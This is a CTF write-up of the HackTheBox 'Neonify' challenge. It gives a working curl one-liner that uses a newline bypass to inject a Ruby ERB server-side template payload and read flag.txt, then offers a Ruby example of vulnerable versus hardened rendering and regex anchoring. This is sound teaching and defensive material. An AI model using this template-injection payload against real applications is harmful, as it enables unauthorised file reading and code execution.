HackTheBox Neonify Writeup

Explore the basics of cybersecurity in the Neonify Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'

Summary

Neonify is an easy-level challenge on Hack The Box built around a server-side template injection (SSTI) vulnerability in a Ruby ERB template. Sending the crafted payload <%= File.open('flag.txt').read %> (URL-encoded, after a leading "a" and a newline) in the neon parameter of a POST request makes the server evaluate the embedded Ruby code and return the contents of flag.txt; grep -Eo 'HTB{.*}' then pulls the flag out of the response. The challenge demonstrates the danger of letting user input reach the template source instead of being handled as data in a template rendering system.
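To make the summary concrete, here is an added Ruby example (not code from the challenge or the original post) showing the vulnerable rendering pattern next to a hardened one, with a harmless arithmetic expression standing in for the file read. The allowlist regex is an illustration of a common validation mistake, not the challenge's actual filter, and the input string is constructed.

```ruby
require 'erb'

# Constructed sample input: a "neon" value whose second line carries an ERB
# expression (the shape of the writeup's payload, with 6 * 7 in place of the
# file read).
USER_INPUT = "a\n<%= 6 * 7 %>"

# Vulnerable pattern: the user's text is spliced into the template *source*,
# so ERB compiles and executes any <%= ... %> the user wrote.
def render_vulnerable(neon)
  template = "<h1 class=\"neon\">#{neon}</h1>"
  ERB.new(template).result(binding)
end

# Hardened pattern: the template source is a fixed, developer-written string;
# the user's text enters only as data and is HTML-escaped at output time.
SAFE_TEMPLATE = ERB.new('<h1 class="neon"><%= ERB::Util.html_escape(neon) %></h1>')

def render_safe(neon)
  SAFE_TEMPLATE.result_with_hash(neon: neon)
end

# Validation caveat: in Ruby, ^ and $ anchor at *line* boundaries, so an
# allowlist written as /^[0-9a-z ]+$/ accepts a string whose first line is
# clean even when a later line carries template syntax. \A and \z anchor the
# whole string. (Hypothetical allowlist, for illustration only.)
def line_anchored_allowlist?(neon)
  neon.match?(/^[0-9a-z ]+$/)
end

def whole_string_allowlist?(neon)
  neon.match?(/\A[0-9a-z ]+\z/)
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(USER_INPUT)      # expression is evaluated: "...a\n42</h1>"
  puts render_safe(USER_INPUT)            # rendered as escaped literal text
  p line_anchored_allowlist?(USER_INPUT)  # true  (first line alone satisfies it)
  p whole_string_allowlist?(USER_INPUT)   # false (whole string is checked)
end
```

Even with a correct allowlist, the durable fix is the second pattern: keep user input out of the template source entirely.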

This post is licensed under CC BY 4.0 by the author.